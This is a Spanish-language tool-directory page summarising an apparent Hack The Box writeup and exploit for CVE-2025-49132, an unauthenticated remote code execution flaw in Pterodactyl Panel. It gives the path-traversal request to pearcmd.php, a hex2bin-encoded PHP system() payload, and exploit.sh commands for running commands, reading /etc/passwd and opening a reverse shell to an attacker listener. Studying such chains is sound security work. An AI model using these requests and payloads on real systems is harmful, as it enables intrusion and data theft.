Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49132_HTB_SEASON10 — Exploit RCE no autenticado para CVE-2025-49132 en Pterodactyl Panel mediante path traversal, inyección de comandos PEAR y ejecución de código PHP. Incluye writeup de HTB y script auxiliar. | Kitploit
Herramientas/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Exploit RCE no autenticado para CVE-2025-49132 en Pterodactyl Panel mediante path traversal, inyección de comandos PEAR y ejecución de código PHP. Incluye writeup de HTB y script auxiliar.

Ver Repositorio
2hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-49132 - Exploit de RCE en Pterodactyl Panel

HTB Temporada 10 - Writeup de la máquina Pterodactyl

Resumen

Objetivo: Máquina Pterodactyl HTB (Dificultad Media)
CVE: CVE-2025-49132
Gravedad: Crítica (CVSS 9.8)
Tipo de ataque: Ejecución remota de código no autenticada
Afectado: Pterodactyl Panel < v1.11.11

Esta cadena de explotación combina:

  1. Recorrido de directorios en el sistema de traducción de locale
  2. Inyección de comandos PEAR a través de pearcmd.php
  3. Ejecución de código PHP mediante escritura de archivo + inclusión

El fallo

El endpoint /locales/locale.json del panel Pterodactyl permite el recorrido de directorios mediante el parámetro locale:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

Esto se puede encadenar con pearcmd.php de PEAR para:

  1. Escribir archivos PHP arbitrarios en /tmp
  2. Ejecutarlos mediante otra petición

Por qué funciona

PEAR (Repositorio y Extensión de Aplicaciones PHP) tiene una herramienta CLI (pearcmd.php) que:

  • Acepta comandos mediante parámetros URL (diseñada solo para CLI)
  • Tiene un comando config-create que escribe archivos
  • NO tiene autenticación cuando se invoca vía web

La cadena de explotación:

root@kitploit:~
Recorrido de directorios → Cargar pearcmd.php → Inyectar PHP mediante config-create → Ejecutar PHP malicioso

El truco de Hex2bin()

Los comandos se codifican en hexadecimal usando hex2bin() para evitar:

  • Problemas de codificación URL
  • Filtros de caracteres especiales
  • Problemas de análisis con Nginx/PHP

Ejemplo:

root@kitploit:~
Comando: whoami
Hex:     77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>

Ejecución remota de código

Método: Usando el exploit.sh proporcionado

root@kitploit:~
chmod +x exploit.sh

# Get user flag
./exploit.sh flag

# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Reverse shell
nc -lvnp 4444  # On attacker machine
./exploit.sh shell 10.10.14.21 4444

Referencias

CVE y Exploits

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

Recursos técnicos

  • Documentación de Pterodactyl Panel
  • Documentación de PEAR
  • Recorrido de directorios OWASP

Descargar herramienta